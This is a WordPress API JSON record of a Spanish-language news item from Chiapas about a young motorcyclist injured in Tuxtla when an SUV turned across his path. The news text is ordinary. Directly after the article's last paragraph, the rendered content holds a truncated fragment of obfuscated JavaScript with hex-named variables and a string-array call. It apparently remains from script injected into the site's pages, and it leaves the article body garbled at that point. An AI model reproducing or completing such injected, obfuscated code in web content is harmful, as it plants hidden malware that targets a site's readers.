{"id":4550,"date":"2022-08-19T22:19:42","date_gmt":"2022-08-19T22:19:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4550"},"modified":"2022-08-19T22:19:43","modified_gmt":"2022-08-19T22:19:43","slug":"por-corte-de-circulacion-motociclista-termina-lesionado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4550","title":{"rendered":"Por corte de circulaci\u00f3n,  motociclista termina lesionado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660947470900-1024x768.jpg\" alt=\"\" class=\"wp-image-4551\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660947470900-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660947470900-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660947470900-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660947470900.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 19 de agosto del 2022. &#8211; Un joven motociclista protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito \u00e9ste jueves en la zona Oriente de Tuxtla,  luego de impactarse contra una camioneta.Los reportes de tr\u00e1nsito dan a conocer que,  el motorista circulaba en el Bulevar \u00c1ngel Albino Corzo,  a la altura de una tienda comercial y Colonia Las Palmas, cuando una Suv Seat roja  que circulaba en el carril de Oriente a Poniente que gir\u00f3 en un retorno sin percatarse del motociclista.Esto ocasion\u00f3 que Emanuel de 22 a\u00f1os de edad,  se impactara su moto Yamaha de color azul y saliera volando.Por el golpe result\u00f3 con lesiones en mano izquierda y en el hombro.Al lugar arribaron param\u00e9dicos de la CRM para atender al lesionado  que fue llevado a un hospital particular.Las unidades fueron remolcadas a un corral\u00f3n en turno y el responsable presentado ante las instancias competentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 19 de agosto del 2022. &#8211; Un joven motociclista protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito \u00e9ste jueves en la zona Oriente de Tuxtla, luego de impactarse contra una camioneta.Los reportes de tr\u00e1nsito dan a conocer que, el motorista circulaba en el Bulevar \u00c1ngel Albino Corzo, a la altura de una tienda comercial &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4551,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4550","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4550","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4550"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4550\/revisions"}],"predecessor-version":[{"id":4552,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4550\/revisions\/4552"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4551"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4550"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4550"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4550"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}